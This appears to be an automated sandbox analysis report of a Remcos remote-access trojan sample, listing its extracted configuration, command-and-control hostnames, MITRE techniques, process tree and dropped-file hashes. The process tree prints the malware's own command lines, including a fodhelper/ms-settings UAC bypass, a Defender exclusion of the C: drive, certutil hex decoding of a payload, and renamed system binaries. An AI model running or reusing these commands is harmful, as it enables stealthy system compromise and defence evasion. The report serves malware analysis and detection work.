remcos | a3e3461ddb704fa103ebe9a2c05e3cfd8389f118d1e5b20f2039337ce7306767

Analysis

max time kernel
149s
max time network
149s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
17-05-2024 20:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

yak.cmd
Size

2.8MB
MD5

0686c44528057a8ca6a5559a7e333917
SHA1

dc8566bf211b2c42d8f3b2187e39a33f5a007673
SHA256

a3e3461ddb704fa103ebe9a2c05e3cfd8389f118d1e5b20f2039337ce7306767
SHA512

02abc13471641c84d0abd35a0ea2a5645dc4dd4a3649c1654cb7b03903a5738ea7d7418a0cb1a80306a79962d5cb111bbb9121d3b551368495f0ad63f86538b2
SSDEEP

24576:WsYQ30r2rIZonlOnDs1xs2BI3wh9nyd83WpMTpcmBiKnvGGnxPfxBJGhRCyQ6:WFQ30LZDnQW2BI3whly8WxkzR0Q6

Score

10^/10

remcos remotehost persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

myumysmeetr.ddns.net:2404

mysweeterbk.ddns.net:2404

meetre1ms.freeddns.org:2404

bbhmeetre1ms.freeddns.org:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-TPT9X3
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Executes dropped EXE 24 IoCs

Processes:

alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe

pid	process
2708	alpha.exe
2056	alpha.exe
2832	alpha.exe
2664	alpha.exe
2688	kn.exe
2620	alpha.exe
3032	alpha.exe
2764	alpha.exe
2508	alpha.exe
2636	xkn.exe
2544	alpha.exe
2516	ger.exe
1712	alpha.exe
2972	kn.exe
684	alpha.exe
2204	Ping_c.pif
2244	alpha.exe
2264	alpha.exe
2248	alpha.exe
2024	alpha.exe
2348	alpha.exe
1212	alpha.exe
2368	alpha.exe
2032	alpha.exe

Loads dropped DLL 17 IoCs

Processes:

cmd.exealpha.exealpha.exexkn.exealpha.exealpha.exe

pid	process
3004	cmd.exe
3004	cmd.exe
3004	cmd.exe
3004	cmd.exe
2664	alpha.exe
3004	cmd.exe
3004	cmd.exe
3004	cmd.exe
3004	cmd.exe
2508	alpha.exe
2636	xkn.exe
2636	xkn.exe
2636	xkn.exe
2544	alpha.exe
3004	cmd.exe
1712	alpha.exe
3004	cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Ping_c.pif

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Duchpovs = "C:\\Users\\Public\\Duchpovs.url"	Ping_c.pif

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

2 drive.google.com
4 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1064 taskkill.exe

flow	ioc
2	drive.google.com
4	drive.google.com

pid	process
1064	taskkill.exe

Modifies registry class 5 IoCs

Processes:

ger.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

Ping_c.pif

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	Ping_c.pif
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Ping_c.pif
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Ping_c.pif
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e210f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Ping_c.pif

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	13	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

Ping_c.pif

pid process

2204 Ping_c.pif
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

xkn.exePing_c.pif

pid process

2636 xkn.exe
2204 Ping_c.pif

pid	process
2204	Ping_c.pif

pid	process
2636	xkn.exe
2204	Ping_c.pif

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

xkn.exetaskkill.exeAUDIODG.EXE

description	pid	process
Token: SeDebugPrivilege	2636	xkn.exe
Token: SeDebugPrivilege	1064	taskkill.exe
Token: 33	2512	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2512	AUDIODG.EXE
Token: 33	2512	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2512	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

SndVol.exe

pid process

2356 SndVol.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

SndVol.exe

pid process

2356 SndVol.exe
2356 SndVol.exe

pid	process
2356	SndVol.exe

pid	process
2356	SndVol.exe
2356	SndVol.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exe

description	pid	process	target process
PID 3004 wrote to memory of 3012	3004	cmd.exe	extrac32.exe
PID 3004 wrote to memory of 3012	3004	cmd.exe	extrac32.exe
PID 3004 wrote to memory of 3012	3004	cmd.exe	extrac32.exe
PID 3004 wrote to memory of 2708	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2708	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2708	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2056	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2056	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2056	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2832	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2832	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2832	3004	cmd.exe	alpha.exe
PID 2832 wrote to memory of 3052	2832	alpha.exe	extrac32.exe
PID 2832 wrote to memory of 3052	2832	alpha.exe	extrac32.exe
PID 2832 wrote to memory of 3052	2832	alpha.exe	extrac32.exe
PID 3004 wrote to memory of 2664	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2664	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2664	3004	cmd.exe	alpha.exe
PID 2664 wrote to memory of 2688	2664	alpha.exe	kn.exe
PID 2664 wrote to memory of 2688	2664	alpha.exe	kn.exe
PID 2664 wrote to memory of 2688	2664	alpha.exe	kn.exe
PID 3004 wrote to memory of 2620	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2620	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2620	3004	cmd.exe	alpha.exe
PID 2620 wrote to memory of 2572	2620	alpha.exe	extrac32.exe
PID 2620 wrote to memory of 2572	2620	alpha.exe	extrac32.exe
PID 2620 wrote to memory of 2572	2620	alpha.exe	extrac32.exe
PID 3004 wrote to memory of 3032	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 3032	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 3032	3004	cmd.exe	alpha.exe
PID 3032 wrote to memory of 2152	3032	alpha.exe	extrac32.exe
PID 3032 wrote to memory of 2152	3032	alpha.exe	extrac32.exe
PID 3032 wrote to memory of 2152	3032	alpha.exe	extrac32.exe
PID 3004 wrote to memory of 2764	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2764	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2764	3004	cmd.exe	alpha.exe
PID 2764 wrote to memory of 2768	2764	alpha.exe	extrac32.exe
PID 2764 wrote to memory of 2768	2764	alpha.exe	extrac32.exe
PID 2764 wrote to memory of 2768	2764	alpha.exe	extrac32.exe
PID 3004 wrote to memory of 2508	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2508	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 2508	3004	cmd.exe	alpha.exe
PID 2508 wrote to memory of 2636	2508	alpha.exe	xkn.exe
PID 2508 wrote to memory of 2636	2508	alpha.exe	xkn.exe
PID 2508 wrote to memory of 2636	2508	alpha.exe	xkn.exe
PID 2636 wrote to memory of 2544	2636	xkn.exe	alpha.exe
PID 2636 wrote to memory of 2544	2636	xkn.exe	alpha.exe
PID 2636 wrote to memory of 2544	2636	xkn.exe	alpha.exe
PID 2544 wrote to memory of 2516	2544	alpha.exe	ger.exe
PID 2544 wrote to memory of 2516	2544	alpha.exe	ger.exe
PID 2544 wrote to memory of 2516	2544	alpha.exe	ger.exe
PID 3004 wrote to memory of 1712	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 1712	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 1712	3004	cmd.exe	alpha.exe
PID 1712 wrote to memory of 2972	1712	alpha.exe	kn.exe
PID 1712 wrote to memory of 2972	1712	alpha.exe	kn.exe
PID 1712 wrote to memory of 2972	1712	alpha.exe	kn.exe
PID 3004 wrote to memory of 684	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 684	3004	cmd.exe	alpha.exe
PID 3004 wrote to memory of 684	3004	cmd.exe	alpha.exe
PID 684 wrote to memory of 1064	684	alpha.exe	taskkill.exe
PID 684 wrote to memory of 1064	684	alpha.exe	taskkill.exe
PID 684 wrote to memory of 1064	684	alpha.exe	taskkill.exe
PID 3004 wrote to memory of 2204	3004	cmd.exe	Ping_c.pif

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\yak.cmd"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3004
- C:\Windows\System32\extrac32.exe
  C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
  2⤵
  PID:3012
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
  2⤵
  - Executes dropped EXE
  PID:2708
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:2056
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2832
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    3⤵
    PID:3052
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\yak.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2664
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\yak.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
    3⤵
    - Executes dropped EXE
    PID:2688
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2620
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
    3⤵
    PID:2572
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3032
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
    3⤵
    PID:2152
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2764
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
    3⤵
    PID:2768
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Users\Public\xkn.exe
    C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2636
  - - C:\Users\Public\alpha.exe
      "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2544
    - - C:\Users\Public\ger.exe
        
        C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        5⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2516
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1712
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
    3⤵
    - Executes dropped EXE
    PID:2972
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:684
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM SystemSettings.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1064
- C:\Users\Public\Libraries\Ping_c.pif
  C:\Users\Public\Libraries\Ping_c.pif
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Modifies system certificate store
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious behavior: EnumeratesProcesses
  PID:2204
- - C:\Windows\SysWOW64\extrac32.exe
    C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Duchpovs.PIF
    3⤵
    PID:1832
- - C:\Windows\SysWOW64\SndVol.exe
    C:\Windows\System32\SndVol.exe
    3⤵
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2356
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
  2⤵
  - Executes dropped EXE
  PID:2244
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:2264
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
  2⤵
  - Executes dropped EXE
  PID:2248
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2024
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2348
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:1212
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2368
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2032

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0xc4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
222B

MD5
6be6b5e3d2a8a4607b2f95f26a21cb74

SHA1
3b5d7edc52b169a9aa532ced089e35a06d89145a

SHA256
e3adafbe3c9eac09a15c9078ac28fe0bd89d2fbcbe1a236bd5b03c0f7656b420

SHA512
efbb0b89861be538355552325694ded9e39cd5c5ff55c3fe54c3d1326e09c2e6325a29c2f7177d76eec8a08afef3bd29b37ce60ef25eb52027b099281f7c6883

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
308B

MD5
98a76365eb9bdd9495c6476c55abcbe0

SHA1
c3b6f62abdda4b414b0547666c643a81871927ab

SHA256
af4ad68a4d9b6c69f82be3700624b9cdb3b87ad23234cd1b78fd10587ffdb4d6

SHA512
2a1b357459c2cdc22f06f160ed5ff545acdae04f79d52452a310e1d9a62a726057f9611778255385ac07cf556e516a007099e76ca439377f90d6768e0a3aaf58

Download Submit
C:\Users\Public\Libraries\Ping_c.pif

Filesize
947KB

MD5
644e25ea5330d2eb902c8f658c60891f

SHA1
a5a3272a74576702aef0d0b34ffdfb6193562b10

SHA256
82a725856f92cb4cef9df55db15792b22b9d887082264bf39456ad08bf98a77c

SHA512
8ee9e3d400a674bc5b0d66123ec43b1ff6eb8914be89c4c498c2cb5a33a3611c0f507ebb66d859e2f0f2c11120d276d4a0c3145050101157f99bb031cdf2bcf9

Download Submit
C:\Users\Public\Ping_c.mp4

Filesize
1.9MB

MD5
72f92e47f66de5e830405b6d5953f217

SHA1
46ad681c7eaf8b176c3caff6e3c09840a5c65bdf

SHA256
458817af56aba58f4becaa2ec1c18d19c0874ae7d151fe80edd8d04b06250c41

SHA512
545cf43aa52a8e64109183571ff937f2da48b9d9d3da9427a7551d8c4b640ffdb49d5d28bed1a081e35da71464a6c8f5da15af29a82be069f7e7e2de6304e68f

Download Submit
C:\Users\Public\alpha.exe

Filesize
337KB

MD5
